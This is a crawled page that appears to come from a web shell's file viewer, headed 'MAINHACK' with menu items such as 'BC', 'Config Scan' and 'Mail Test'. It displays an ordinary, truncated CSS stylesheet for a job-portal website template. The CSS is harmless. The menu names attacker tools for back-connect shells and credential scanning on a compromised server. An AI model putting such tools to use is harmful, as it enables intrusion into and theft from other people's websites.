[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: style.css
body { font-family: 'Dosis', sans-serif; background: #fff; } body a { transition: 0.5s all; -webkit-transition: 0.5s all; -moz-transition: 0.5s all; -o-transition: 0.5s all; -ms-transition: 0.5s all; text-decoration: none; outline: none; } h1, h2, h3, h4, h5, h6 { margin: 0; font-family: 'Dosis', sans-serif; } p { margin: 0; color: #777; font-size: 1em; line-height: 2; letter-spacing: 1px; } ul { margin: 0; padding: 0; } ul { list-style-type: none; } body a:hover { text-decoration: none; } body a:focus { outline: none; text-decoration: none; } .list-group-item { background-color: transparent; } /*-- bottom-to-top --*/ #toTop { display: none; text-decoration: none; position: fixed; bottom: 24px; right: 3%; overflow: hidden; z-index: 999; width: 32px; height: 32px; border: none; text-indent: 100%; background: url(../images/move-top.png) no-repeat 0px 0px; } #toTopHover { width: 32px; height: 32px; display: block; overflow: hidden; float: right; opacity: 0; -moz-opacity: 0; filter: alpha(opacity=0); } /*-- //bottom-to-top --*/ /*--/navbar--*/ .navbar { padding: 0em 2em; border-bottom: 1px solid rgba(243, 242, 242, 0.41); } nav.navbar.fixed-top.navbar-expand-lg.navbar-light.navbar-fixed-top { background: none; border: none; padding: 1em; -webkit-transition: .5s all; -moz-transition: .5s all; transition: .5s all; z-index: 99; } h1.wthree-logo a { text-transform: capitalize; font-size: 0.9em; font-weight: 400; color: #fff; } h1.wthree-logo a span { background: #FFC107; width: 40px; display: inline-block; color: #000; text-align: right; margin-right: 5px; padding-right: 4px; } a.scroll.bnr-btn { background: #ffc107; text-transform: capitalize; color: #000; padding: 5px 20px; display: inline-block; font-weight: 600; margin-top: 1em; border-radius: 20px; } a.scroll.bnr-btn:hover { padding: 5px 30px; color: #fff; } .bnr-w3pvt-txt h4 { color: #fff; font-size:25px; letter-spacing: 2px; text-align: center; } .bnr-w3pvt-txt p { width: 600px; } .bnr-w3pvt-txt h2 { color: #ffc107; font-size: 60px; margin: 10px 0; text-transform: uppercase; font-weight: bold; text-align: center; } .bnr-w3pvt-txt h3 { color: #fff; font-size: 1.6em; text-transform: capitalize; } .bnr-w3pvt-txt { margin-left: 0em; } .ban-form{ } .ban-form button.btn1 { background: #ffc107; color: #054d66; font-weight: 700; font-size: 1.2em; padding: 5px 0; width: 100%; cursor: pointer; outline: none; border: none; border-radius: 0px; transition: 0.5s all; -webkit-transition: 0.5s all; -moz-transition: 0.5s all; -o-transition: 0.5s all; -ms-transition: 0.5s all; height: 50px; } .ban-form button.btn1:hover { background: #0b0802; color: #ffc107; } .ban-form label{ width: 19%; border-right: 1px solid; float: left; background: #fff; text-align: center; font-size: 20px; height: 50px; color: #bfb8b6; line-height: 52px;} .ban-form input[type="text"], .ban-form input[type="submit"] { color: #777; background: #fff; outline: none; font-size: 0.91em; padding: 1em 1em; border: none; -webkit-appearance: none; display: inline-block; border-radius: 0px; letter-spacing: 1px; width: 81%; height: 50px; } nav.navbar.fixed-top.navbar-expand-lg.navbar-light.navbar-fixed-top.top-nav-collapse { background: -webkit-linear-gradient(top right, #00d8c2, #0068b7); padding: 0.8em 0; box-shadow: 0 3px 5px -1px rgba(0, 0, 0, .2), 0 5px 8px 0 rgba(0, 0, 0, .14), 0 1px 14px 0 rgba(0, 0, 0, .12); } nav.navbar.fixed-top.navbar-expand-lg.navbar-light.navbar-fixed-top.top-nav-collapse h1.wthree-logo a { font-size: 0.7em; } nav.navbar.fixed-top.navbar-expand-lg.navbar-light.navbar-fixed-top.top-nav-collapse h1.wthree-logo a span { width: 34px; } li.nav-item { margin: 0 1px; } .navbar-light .navbar-nav .nav-link { padding: 0.3em 1.4em; color: #fff; background: transparent; font-size: 1.1em; letter-spacing: 1px; } .navbar-light .navbar-nav .show > .nav-link, .navbar-light .navbar-nav .active > .nav-link, .navbar-light .navbar-nav .nav-link.show, .navbar-light .navbar-nav .nav-link.active, .navbar-light .navbar-nav .nav-link:hover, .navbar-light .navbar-nav .nav-link:focus { background: transparent; color: #fff; } .dropdown-item { padding: 0.5em 1.5rem; font-size: 0.9em; margin: 0; } .dropdown-menu { margin: 0; padding: 0; } /*---*/ .log-rig{ width: 70%; float: right; position: relative; } .log-rig .dropdown { position: relative; display: inline-block; float: right; background: #000; background: -webkit-linear-gradient(top right, #00d8c2, #0068b7); color: #fff; font-weight: bold; text-transform: uppercase; padding: 10px 30px; margin: 0 10px; } .log-rig .dropdown .dropdown-content { display: none; position: absolute; background-color: #fff; min-width: 157px; box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2); padding: 12px 16px; z-index: 1; left: 0; top: 44px; } .dropdown:hover .dropdown-content { display: block; } .log-rig .dropdown .dropdown-content a{ display: block; } .caret { display: inline-block; width: 0; height: 0; margin-left: 2px; vertical-align: middle; border-top: 4px dashed; border-top: 4px solid\9; border-right: 4px solid transparent; border-left: 4px solid transparent; } /* Important styles */ #toggle { display: block; width: 28px; margin: 15px auto 10px; height: 10px; } #toggle span:after, #toggle span:before { content: ""; position: absolute; left: 0; top: -9px; } #toggle span:after { top: 9px; } #toggle span { position: relative; display: block; } #toggle span, #toggle span:after, #toggle span:before { width: 100%; height: 5px; background-color: #fff; transition: all 0.3s; backface-visibility: hidden; border-radius: 2px; } /* on activation */ #toggle.on span { background-color: transparent; } #toggle.on span:before { transform: rotate(45deg) translate(5px, 5px); } #toggle.on span:after { transform: rotate(-45deg) translate(7px, -8px); } #toggle.on+#menu { opacity: 1; visibility: visible; } /*-- /home-page--*/ .banner-bottom-wthree{-webkit-clip-path: polygon(0 15%, 100% 0, 100% 85%, 0 100%); clip-path: polygon(0 15%, 100% 0, 100% 85%, 0 100%); background: -webkit-linear-gradient(TO top right, #00d8c2, #0068b7); background: #fcd000; padding: 12em 30px 10em 20px; padding-top: 12em; padding-bottom: 10em; width: 100%; overflow: hidden; background: -webkit-linear-gradient(top right, #00d8c2, #0068b7); } h3.tittle span { display: block; text-transform: uppercase; font-size: 0.3em; color: #de0f17; letter-spacing: 4px; font-weight: 600; } h3.tittle { text-shadow: 2px 2px 2px rgba(41, 41, 41, 0.15); font-size: 2.7em; color: #333338; font-weight: 400; margin: 60px 0 0 0; } .view-tenth img { -webkit-transform: scaleY(1); -moz-transform: scaleY(1); -o-transform: scaleY(1); -ms-transform: scaleY(1); transform: scaleY(1); -webkit-transition: all 0.7s ease-in-out; -moz-transition: all 0.7s ease-in-out; -o-transition: all 0.7s ease-in-out; -ms-transition: all 0.7s ease-in-out; transition: all 0.7s ease-in-out; width: 100%; } .view-tenth .mask { -webkit-transition: all 0.5s linear; -moz-transition: all 0.5s linear; -o-transition: all 0.5s linear; -ms-transition: all 0.5s linear; transition: all 0.5s linear; -ms-filter: "progid: DXImageTransform.Microsoft.Alpha(Opacity=0)"; filter: alpha(opacity=0); opacity: 0; } .view-tenth img { filter: alpha(opacity=1); opacity: 1; } .view-tenth:hover .mask { -ms-filter: "progid: DXImageTransform.Microsoft.Alpha(Opacity=100)"; filter: alpha(opacity=100); opacity: 1; } .view { float: none; overflow: hidden; position: relative; text-align: center; background: #0ebeff; min-height: 250px; } .view1 { background: #47cf73; } .view2 { background: #ae63e4; } .view3 { background: #2f59fb; } .view4 { background: #ff3c41; } .view5 { background: #76daff; } .view .mask, .view .content { position: absolute; overflow: hidden; top: 0; left: 0; } .view img { display: block; position: relative; } .category_text_box p { line-height: 1.8em; width: 89%; margin: 0 auto; font-size: 15px; color: #444546; line-height: 28px; font-weight: 600; letter-spacing: 1px; } .category_text_box h3 { font-size: 20px; color: #fff; margin: 1em 0 0.5em 0; font-weight: bold; letter-spacing: 4px; text-transform: uppercase; } .category_grid { padding-right: 0; } .banner_bottom_left h3 { color: #212121; font-size: 3em; font-weight: 700; text-shadow: 2px 2px 2px rgba(189, 187, 187, 0.8); -webkit-text-shadow: 2px 2px 2px rgba(189, 187, 187, 0.8); -moz-text-shadow: 2px 2px 2px rgba(189, 187, 187, 0.8); -o-text-shadow: 2px 2px 2px rgba(189, 187, 187, 0.8); -ms-text-shadow: 2px 2px 2px rgba(189, 187, 187, 0.8); letter-spacing: 1px; } .category_grid i { color: #fff; font-size: 2.9em; margin-top: 1.5em; } .banner_bottom_right .img_agile { position: relative; border: 7px solid #34bf49; } .banner_bottom_right .img_agile img { position: relative; top: 25px; left: 25px; display: block; width: 100%; height: auto; transition: all 500ms ease; -moz-transition: all 500ms ease; -webkit-transition: all 500ms ease; -ms-transition: all 500ms ease; -o-transition: all 500ms ease; } /*--/team--*/ /*--/tabs --*/ ul#pills-tab { margin-left: 0em; } .nav-pills .nav-link { padding: 0.2em 2em; letter-spacing: 1px; color: #333; background: #f2f2f5; font-size: 1.8em; } .job-single-sec h4 a { color: #333; } .nav-pills .nav-link.active, .nav-pills .show > .nav-link { color: #fff; background: #00cbc1; } .nav-pills .nav-link { border-radius: 0; } .tech-btm h5 { font-size: 0.9em; line-height: 1.4em; font-weight: 600; } .menu-img-info h5 { font-size: 1.8em; color: #7b7d80; text-shadow: 0 1px 2px rgba(0, 0, 0, 0.37); line-height: 1.4em; } p.sub-meta { color: #1cbbb4; font-size: 1.2em; font-weight: 600; } .text-info-sec p { color: #8c9398; } .text-info-sec h5 { font-size: 1.4em; color: #4e4f50; text-shadow: 0 1px 2px rgba(18, 18, 19, 0.13); font-weight: 700; text-transform: uppercase; } .text-info-sec i { color: #EB2941; } .job-post-icon { width: 13%; float: left; } .job-post-icon i { width: 50px; height: 50px; background: #f2f2f5; text-align: center; line-height: 3em; } .job-single-sec { float: left; width: 85%; margin-left: 2%; } ul.job-list-info li { list-style: none; font-size: 0.9em; color: #999; } ul.job-list-info li i { list-style: none; color: #666; margin-right: 5px; } .job-single-time i { margin-right: 5px; color: #555; } ul.job-list-info li:nth-child(2) { margin: 0 1em; } span.job-time { display: block; color: #2529d8; margin: 0.5em 0; text-transform: uppercase; } a.aply-btn { color: #fff; padding: 0.3em 1em; background: #de0f17; font-size: 0.9em; letter-spacing: 1px; } .job-single-sec h4 { font-size: 1.3em; } .job-post-info { padding-right: 0; padding-left: 6px; } .job-post-main { padding: 1.2em 1em; background: #fff; margin: 0; box-shadow: 0 0 6px 1px #f7f7f7; border: 1px solid #efebeb; } .job-post-main:hover { background: #f5f5f5; box-shadow: 0 0 6px 1px #f5f5f5; -webkit-transition: all 0.7s ease-in-out; -moz-transition: all 0.7s ease-in-out; -o-transition: all 0.7s ease-in-out; -ms-transition: all 0.7s ease-in-out; transition: all 0.7s ease-in-out; } /*--//tabs--*/ /* menu appearance*/ #menu { position: absolute; right: -77px; top: 53px; width: 185px; padding: 10px; text-align: center; border-radius: 4px; background: #ffc107; opacity: 0; visibility: hidden; transition: opacity .4s; } #menu:after { position: absolute; top: -20px; left: 80px; content: ""; display: block; border-left: 15px solid transparent; border-right: 15px solid transparent; border-bottom: 20px solid #ffc107; } div#menu li a { color: #fff; font-weight: 600; } div#menu li a:hover { color: #044f77; font-weight: 600; } #menu li { text-transform: uppercase; font-size: 13px; margin-bottom: 10px; font-weight: 600; letter-spacing: 1px; } /* banner */ .clip-wthree { -webkit-clip-path: polygon(0 0, 100% 0, 100% 86%, 0% 100%); clip-path: polygon(0 0, 100% 0, 100% 86%, 0% 100%); } .cliptop-wthree { -webkit-clip-path: polygon(0 14%, 100% 0, 100% 86%, 0 100%); clip-path: polygon(0 14%, 100% 0, 100% 86%, 0 100%); } .clipbottom-wthree { -webkit-clip-path: polygon(0 14%, 100% 0, 100% 0%, 0 100%); clip-path: polygon(0 20%, 100% 0, 100% 100%, 0 100%); } .cliptop-blog-wthree { -webkit-clip-path: polygon(0 6%, 100% 0, 100% 94%, 0 100%); clip-path: polygon(0 6%, 100% 0, 100% 94%, 0 100%); } .cliptop-portfolio-wthree { -webkit-clip-path: polygon(0 15%, 100% 0, 100% 85%, 0 100%); clip-path: polygon(0 15%, 100% 0, 100% 85%, 0 100%); background: -webkit-linear-gradient(TO top right, #00d8c2, #0068b7); background: #00c4be; padding: 12em 0; background: -webkit-linear-gradient(top right, #00d8c2, #5553d0); position: relative; } .banner-w3pvt { background: url(../images/banner.jpg) no-repeat center; min-height: 100vh; background-size: cover; position: relative; } .banner-w3pvt img { position: absolute; width: 60%; top: 145px; left: 0px; } .banner-w3pvt:before { content: ''; position: absolute; width: 100%; height: 100%; top: 0; left: 0; background: #27615B; background: -webkit-linear-gradient(TO top right, #00d8c2, #0068b7); background: -moz-linear-gradient(TO top right, #00d8c2, #0068b7); background: linear-gradient(TO top right, #00d8c2, #0068b7); background-size: cover; min-height: 100vh; opacity: 0.9; } a.rea-m{ position: absolute; top: 100px; right: 190px; z-index: 99999999; width: 100px; background: #000; border-radius: 50%; height: 100px; font-size: 16px; line-height: 100px; color: #fff; background: -webkit-linear-gradient(top right, #00d8c2, #0068b7); border: 1px solid #c6c6c6; padding: 0 0 0 10px; } /*--//mid--*/ .mid { background: url(../images/7.jpg) no-repeat 0px 0px; background-size: cover; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; -moz-background-size: cover; min-height: 500px; -webkit-clip-path: polygon(0 15%, 100% 0, 100% 85%, 0 100%); clip-path: polygon(0 25%, 100% 0, 100% 75%, 0 100%); } h3.tittle.cen { color: #fff; } .resume a { padding: 1em 2em; color: #fff; letter-spacing: 2px; border: 1px solid #fff; } /*--//mid--*/ /* //banner */ .blog .carousel-indicators { left: 0; top: auto; bottom: -40px; } /* The colour of the indicators */ .blog .carousel-indicators li { background: #ffc107; border-radius: 50%; width: 8px; height: 8px; } .blog .carousel-indicators .active { background: #fff; opacity: 0.5; } /*Inner banneer*/ .banner-inn{ position: relative; height: 350px; overflow: hidden; background: #ccc; -webkit-clip-path: polygon(0 0, 100% 0, 100% 60%, 0% 100%); clip-path: polygon(0 0, 100% 0, 100% 60%, 0% 100%); } .banner-inn::before { content: ''; position: absolute; width: 100%; height: 100%; top: 0; left: 0; background: #27615B; background: -webkit-linear-gradient(TO top right, #00d8c2, #0068b7); background: -moz-linear-gradient(TO top right, #00d8c2, #0068b7); background: linear-gradient(TO top right, #00d8c2, #0068b7); background-size: auto; background-size: cover; min-height: 100vh; opacity: 0.9; } .banner-inn img.img-in{ width:100%; } /* about */ .sec-space { padding: 5em 0; } .ab-grid-bottom { margin-top: 5em; } h4.w3layouts_pvt-head { text-transform: capitalize; font-weight: bold; font-size: 2em; color: #0068b7; } span.title-icon-wthree { color: #ffc107; font-size: 1em; } .title-sec-w3layouts_pvt p { color: #333; } .title-sec-w3layouts_pvt { border-left: 5px #bdbdbd solid; padding-left: 1em; } h4.feed-title { color: #0068b7; font-size: 1.2em; text-transform: capitalize; font-weight: 600; } a.btn-w3layouts_pvt span { margin-left: 5px; color: #ffc107; font-size: 1em; } a.btn-w3layouts_pvt:hover { color: #0068b7; letter-spacing: 0.5px; } .ab-pvtw3 p { width: 478px; } a.btn-w3layouts_pvt { display: inline-block; margin-top: 1em; color: #000; font-weight: 600; } .clip-each { display: block; position: relative; -webkit-clip-path: polygon(25% 5%, 75% 5%, 100% 50%, 75% 95%, 25% 95%, 0% 50%); clip-path: polygon(25% 5%, 75% 5%, 100% 50%, 75% 95%, 25% 95%, 0% 50%); margin: 0 auto; } .clip-border { background: #27615B; background: -webkit-linear-gradient(TO top right, #00d8c2, #0068b7); background: -moz-linear-gradient(TO top right, #00d8c2, #0068b7); background: linear-gradient(TO top right, #00d8c2, #0068b7); width: 100px; height: 100px; padding: 25px; } .clip-border::after { content: ""; position: absolute; top: 4%; left: 4%; right: 4%; bottom: 4%; margin: 0 auto; background: #fff; -webkit-transition: all 0.3s linear; transition: all 0.3s linear; -webkit-clip-path: polygon(25% 5%, 75% 5%, 100% 50%, 75% 95%, 25% 95%, 0% 50%); clip-path: polygon(25% 5%, 75% 5%, 100% 50%, 75% 95%, 25% 95%, 0% 50%); z-index: -1; } .ab-border { position: absolute; width: 200px; height: 200px; border-width: 4px 0px 0px 0px; border-style: dotted; border-color: #000; border-radius: 50%; left: 183px; top: -39px; } .ab-border span { font-size: 1.5em; color: #0967ac; background: #fff; position: absolute; top: -13px; left: 89px; } /* //about */ /* gallery page */ /* gallery page */ .agile_gallery_grids { padding: 0 2em; } .demo>li { list-style-type: none; margin: 2px; display: inline-block; width: 271px; } /*jquery.picEyes*/ .picshade { position: fixed; left: 0; top: 0; width: 100%; height: 100% !important; background-color: #000; opacity: 0.91; filter: alpha(opacity=91); z-index: 99; display: none; } .pictures_eyes_close { position: fixed; top: 30px; right: 30px; display: inline-block; width: 30px; height: 30px; background: url(../images/close.png) no-repeat; z-index: 100; display: none; } .pictures_eyes { position: fixed; width: 100%; left: 0; top: 0; z-index: 199; display: none; } .pictures_eyes_in { position: relative; text-align: center; } .pictures_eyes_in img { max-height: 500px; max-width: 700px; } .pictures_eyes_in .prev, .pictures_eyes_in .next { position: absolute; top: 50%; width: 51px; height: 51px; cursor: pointer; } .pictures_eyes_in .prev { left: 35px; background: url(../images/left1.png) no-repeat; } .pictures_eyes_in .next { right: 35px; background: url(../images/right1.png) no-repeat; } .pictures_eyes_indicators { position: fixed; left: 0; bottom: 15px; width: 100%; text-align: center; z-index: 299; } .pictures_eyes_indicators a { display: inline-block; width: 50px; height: 50px; margin: 6px 3px 0 3px; border: 1px solid #ddd; border-radius: 10px; box-shadow: 0 0 2px #000; filter: alpha(opacity=50); opacity: 0.5; overflow: hidden; } .pictures_eyes_indicators img { height: 50px; } .pictures_eyes_indicators .current { filter: alpha(opacity=100); opacity: 1; } .gallery-grid1 { position: relative; overflow: hidden; cursor: pointer; } .gallery-grid1 .p-mask, .row .product .vm-product-media-container .p-mask { opacity: 0; visibility: hidden; background: rgba(25, 24, 24, 0.8); position: absolute; padding: 1em 1em; width: 100%; top: 0; -webkit-transform: translate3d(0px, 0px, 0px); -moz-transform: translate3d(0px, 0px, 0px); -ms-transform: translate3d(0px, 0px, 0px); -o-transform: translate3d(0px, 0px, 0px); transform: translate3d(0px, 0px, 0px); -webkit-transition: all .5s ease 0s; -moz-transition: all .5s ease 0s; transition: all .5s ease 0s; text-align: center; } .gallery-grid1 .p-mask .p-desc { color: #a3a3a3; position: relative; display: block; margin-bottom: 10px; padding-bottom: 10px; font-size: 1em; } .gallery-grid1:hover .p-mask, .row .product:hover .p-mask { opacity: 1; visibility: visible; -webkit-transform: translate3d(0px, 0px, 0px); -moz-transform: translate3d(0px, 0px, 0px); -ms-transform: translate3d(0px, 0px, 0px); -o-transform: translate3d(0px, 0px, 0px); transform: translate3d(0px, 0px, 0px); } .p-mask h4 { color: #fff; font-size: 1.5em; font-weight: 600; letter-spacing: 1px; text-transform: capitalize; } .p-mask p { color: #f5f5f5; font-size: 13px; margin-top: 5px; } .pictures_eyes_in { position: relative; text-align: center; } .pictures_eyes_in img { width: 100%; } /* //gallery */ /* testimonials */ .testimonials { padding: 4em 0; } #slider { box-shadow: none; -moz-box-shadow: none; -webkit-box-shadow: none; margin: 0 auto; } .rslides_tabs { list-style: none; padding: 0; background: rgba(0, 0, 0, .25); box-shadow: 0 0 1px rgba(255, 255, 255, .3), inset 0 0 5px rgba(0, 0, 0, 1.0); -moz-box-shadow: 0 0 1px rgba(255, 255, 255, .3), inset 0 0 5px rgba(0, 0, 0, 1.0); -webkit-box-shadow: 0 0 1px rgba(255, 255, 255, .3), inset 0 0 5px rgba(0, 0, 0, 1.0); font-size: 18px; list-style: none; margin: 0 auto 50px; max-width: 540px; padding: 10px 0; text-align: center; width: 100%; } .rslides_tabs li { display: inline; float: none; margin-right: 1px; } .rslides_tabs a { width: auto; line-height: 20px; padding: 9px 20px; height: auto; background: transparent; display: inline; } .rslides_tabs li:first-child { margin-left: 0; } .rslides_tabs .rslides_here a { background: rgba(255, 255, 255, .1); color: #fff; font-weight: bold; } .events { list-style: none; } .callbacks_container { position: relative; } ul.callbacks_tabs { position: absolute; z-index: 2; right: 10%; bottom: 50px; } .callbacks_tabs a { visibility: hidden; } .callbacks_tabs a:after { content: "\f111"; font-size: 0; visibility: visible; display: inline-block; height: 10px; width: 10px; border-radius: 50%; background: #ff1949; } .callbacks_here a:after { background: #333; } /* .callbacks_nav { position: absolute; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); top: 78%; opacity: 0.7; z-index: 3; text-indent: -9999px; overflow: hidden; text-decoration: none; height: 34px; width: 34px; background: url("../images/left.png") no-repeat 0px 0px; } .callbacks_nav.prev { left: auto; background: url("../images/back.png") no-repeat 0px 0px; left: 18em; } .callbacks_nav.next { left: auto; background: url("../images/next.png") no-repeat 0px 0px; right: 18em; } .callbacks_nav:active { opacity: 1.0; } .callbacks2_nav:active { opacity: 1.0; }*/ #slider-pager a { display: inline-block; } #slider-pager span { float: left; } #slider-pager span { width: 100px; height: 15px; background: #fff; display: inline-block; border-radius: 30em; opacity: 0.6; } #slider-pager .rslides_here a { background: #FFF; border-radius: 30em; opacity: 1; } #slider-pager a { padding: 0; } #slider-pager li { display: inline-block; } .rslides { position: relative; list-style: none; overflow: hidden; padding: 0; margin: 0; width: 100%; } .rslides li { -webkit-backface-visibility: hidden; position: absolute; display: none; left: 0%; top: 0; width: 100%; } .rslides li { position: relative; display: block; float: none; } .testi-pos { margin-top: 1em; } .callbacks_tabs li { display: inline-block; } .callbacks_tabs a { visibility: hidden; width: 20px; line-height: 19px; height: 20px; text-align: center; color: #000; font-weight: 600; display: block; background: #fff; border-radius: 50%; } .callbacks_tabs a:hover { background: #1165f3; color: #fff; } .testi-pos h4 { text-transform: capitalize; font-size: 1.3em; color: #ff1949; font-weight: 600; } .testi-agile h4 { color: #000; font-size: 1em; text-transform: capitalize; margin: 1em 0 0.5em; font-weight: bold; } .testi-agile p { width: 70%; color: #333; font-size: 1em; } /* //testimonials */ /*-- Contact-form --*/ div#contact { position: relative; } button.btn.btn-block.text-uppercase { font-weight: 600; background: #ffc107; color: #333; letter-spacing: 1px; } .w3layouts-contact-pos { position: absolute; left: 3%; width: 35%; top: 0; height: 99%; background: #0081bf; } .w3layouts-contact-pos-grid { padding: 9em 2em; } form.contact-wthree { margin-top: 2em; } .w3layouts-contact-pos-grid li { color: #333; font-size: 0.95em; line-height: 2; font-weight: 600; } .w3layouts-contact-pos-grid.sr1.row { padding: 1em 0; } .w3layouts-contact-pos-grid li a { color: #333; } .w3layouts-contact-pos-grid span { color: #00c6d6; } .w3layouts-contact-pos-grid li a:hover { color: #000; } .map-grid { position: relative; } .map-grid iframe { width: 100%; min-height: 650px; } .contact-title { text-transform: capitalize; font-size: 1.3em; font-weight: 600; color: #131313; margin-bottom: 0.5em; } .address p a:hover { color: #000; } form.contact-wthree label { width: 45px; height: 39px; text-align: center; background: #ffc107; line-height: 41px; color: #eee; margin-bottom: 0; } .contact-top1 button { background: #b031d9; letter-spacing: 1px; } .form-control:focus { box-shadow: 0 0 0 0.2rem transparent; } form.contact-wthree .form-control { border-radius: 0; background: #fff; border: none; font-size: 1rem; } textarea.form-control { resize: none; } /* //contact */ /* social */ .social_w3ls_pvt ul { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); margin: 0; padding: 0; display: flex; } .social_w3ls_pvt ul li { list-style: none; margin: 0 60px 0 0; } .social_w3ls_pvt ul li:last-child { margin-right: 0; } .social_w3ls_pvt ul li .fab { font-size: 25px; color: #fff; line-height: 45px; transition: .5s; } .social_w3ls_pvt ul li .fas { font-size: 25px; color: #262626; line-height: 45px; transition: .5s; } .social_w3ls_pvt ul li a { position: relative; display: block; width: 45px; height: 45px; background-color: #fff; text-align: center; transform: perspective(100px) rotate(-30deg) skew(25deg) translate(0, 0); transition: .5s; box-shadow: -20px 20px 10px #000; } .social_w3ls_pvt ul li a::before { content: ""; position: absolute; top: 10px; left: -20px; height: 100%; width: 20px; background: #b1b1b1; transition: .5s; transform: rotate(0deg) skewY(-45deg); } .social_w3ls_pvt ul li a::after { content: ""; position: absolute; top: 45px; left: -11px; height: 20px; width: 100%; background: #b1b1b1; transition: .5s; transform: rotate(0deg) skewX(-45deg); } .social_w3ls_pvt ul li a:hover { transform: perspective(1000px) rotate(-30deg) skew(25deg) translate(20px, -20px); } .social_w3ls_pvt ul li a:hover { box-shadow: -50px 50px 50px #757575; } .social_w3ls_pvt ul li a .fa { color: #fff; } .social_w3ls_pvt ul li a:hover { transform: perspective(1000px) rotate(-30deg) skew(25deg) translate(20px, -20px); box-shadow: -50px 50px 50px #757575; } .social_w3ls_pvt ul li:nth-child(1) a { background: #3b5999; } .social_w3ls_pvt ul li:nth-child(1) a:before { background: #2e4a86; } .social_w3ls_pvt ul li:nth-child(1) a:after { background: #4a69ad; } .social_w3ls_pvt ul li:nth-child(2) a { background: #55acee; } .social_w3ls_pvt ul li:nth-child(2) a:before { background: #4184b7; } .social_w3ls_pvt ul li:nth-child(2) a:after { background: #4d9fde; } .social_w3ls_pvt ul li:nth-child(3) a { background: #dd4b39; } .social_w3ls_pvt ul li:nth-child(3) a:before { background: #c13929; } .social_w3ls_pvt ul li:nth-child(3) a:after { background: #e83322; } .social_w3ls_pvt ul li:nth-child(4) a { background: #0077B5; } .social_w3ls_pvt ul li:nth-child(4) a:before { background: #036aa0; } .social_w3ls_pvt ul li:nth-child(4) a:after { background: #0d82bf; } .social_w3ls_pvt ul li:nth-child(5) a { background: #bd081c; } .social_w3ls_pvt ul li:nth-child(5) a:before { background: #bd081c; } .social_w3ls_pvt ul li:nth-child(5) a:after { background: #bd081c; } /* //social */ footer { background: #17a2b8; padding: 1rem; background: -webkit-linear-gradient(top right, #00d8c2, #0068b7); } /*/team */ .team-agile-row { display: -webkit-box; display: -ms-flexbox; display: flex; -ms-flex-wrap: wrap; flex-wrap: wrap; margin-right: -15px; margin-left: -15px; } .box20 { position: relative; overflow: hidden; border: 8px solid rgba(255, 255, 255, 0.35); } .box20:after, .box20:before { position: absolute; content: "" } .box20:before { width: 80%; height: 220%; background: #ffc107; top: -50%; left: -100%; z-index: 1; transform: rotate(25deg); transform-origin: center top 0; transition: all .5s ease 0s } .box20:hover:before { left: 10% } .box20:after { width: 55%; height: 175%; background-color: rgba(0, 0, 0, .8); bottom: -1000%; left: 53%; transform: rotate(-33deg); transform-origin: center bottom 0; transition: all .8s ease 0s } .box20 .box-content, .box20 .icon { width: 100%; padding: 0 20px; position: absolute; left: 0; z-index: 2; transition: all 1.1s ease 0s } .box20:hover:after { bottom: -70% } .box20 img { width: 100%; height: auto } .box20 .box-content { top: -100%; color: #fff } .box20:hover .box-content { top: 30px } .box20 .title { font-size: 20px; margin: 0; text-transform: capitalize; color: #fff; } .box20 .icon li a, .box20 .post { display: inline-block; font-size: 14px } .box20 .post { margin-top: 5px; text-transform: capitalize; } .box20 .icon { list-style: none; margin: 0; bottom: -100% } .box20:hover .icon { bottom: 25px } .box20 .icon li { display: inline-block } .box20 .icon li a { width: 35px; height: 35px; line-height: 35px; background: #444; border-radius: 50%; margin: 0 3px; color: #fff; text-align: center; transition: all .5s ease 0s } .box20 .icon li a:hover { background: #fff; color: #ff402a } @media only screen and (max-width:990px) { .box20 { margin-bottom: 30px } } @media only screen and (max-width:479px) { .box20 .title { font-size: 20px } } .w3-slide-grid h5 a { color: #fff; margin-bottom: 1em; font-size: 1em; display: block; letter-spacing: 1px; } /* //team */ .cliptop-blog-wthree { -webkit-clip-path: polygon(0 6%, 100% 0, 100% 94%, 0 100%); clip-path: polygon(0 15%, 100% 0, 100% 80%, 0 100%); padding: 12em 0 15em; background: -webkit-linear-gradient(top right, #00d8c2, #0068b7); background: #EB5470; } span.field-icon { width: 50px; height: 50px; line-height: 50px; color: #ffffff; text-align: center; background: #17a2b8; border-radius: 50%; font-size: 1.2em; } .cd-grid ul li { color: #000; font-weight: 500; margin-bottom: 0.5em; font-size: 1em; } .cd-grid ul li a { color: #000; font-size: 1em; letter-spacing: 1px; } .contact-row-w3pvt { border-bottom: 1px solid #dedede; } .cd-grid p { color: #000; } /*raj nwe ad block all css*/ .candidate_registration{ position: relative; width:100%; padding:0; margin:0; } .candidate_registration .registration-can { width: 50%; margin: 0 auto; background: #00fff2; background: #ffc107; -webkit-clip-path: polygon(0 0, 100% 0, 100% 60%, 0% 100%); clip-path: polygon(0 35px, 100% 0, 100% 100%, 0 100%); padding: 50px 20px 15px;} .registration-can .input-group { margin-bottom: 15px; padding: 0px 10px; border-bottom: 1px solid #fff; width: 100%; } .registration-can .input-group label { font-size: 15px;font-family: 'Oswald', sans-serif; width: 40%; text-align: left; float: left; } .registration-can .input-group input[type="text"] { font-size: 15px; color: #000; font-weight: bold; text-align: left; text-transform: none; letter-spacing: 1px; padding: 5px 0 5px 20px; width: 60%; display: inline-block; box-sizing: border-box; border: none; border-bottom-color: currentcolor; border-bottom-style: none; border-bottom-width: medium; outline: none; background: transparent; float: right; border-left: 1px solid #fff; } .registration-can .input-group input[type="password"] { font-size: 15px; color: #000; font-weight: bold; text-align: left; text-transform: none; letter-spacing: 1px; padding: 5px 0 5px 20px; width: 60%; display: inline-block; box-sizing: border-box; border: none; border-bottom-color: currentcolor; border-bottom-style: none; border-bottom-width: medium; outline: none; background: transparent; float: right; border-left: 1px solid #fff; } .registration-can .input-group select { font-size: 15px; color: #000; font-weight: bold; text-align: left; text-transform: none; letter-spacing: 1px; padding: 5px 0 5px 20px; width: 60%; display: inline-block; box-sizing: border-box; border: none; border-bottom-color: currentcolor; border-bottom-style: none; border-bottom-width: medium; outline: none; background: transparent; float: right; font-family: 'Oswald', sans-serif; border-left: 1px solid #fff; } .registration-can .input-group input[type=radio] { box-sizing: border-box; padding: 0; margin: 4px 6px 0 15px; } .registration-can input[type="submit"] { padding: 10px 0; width: 100%; border: none; background: -webkit-linear-gradient(top right, #00d8c2, #0068b7); margin: 20px 0px 10px; } .candidate_registration .registration-can2 { width: 50%; margin: 0 auto; background: 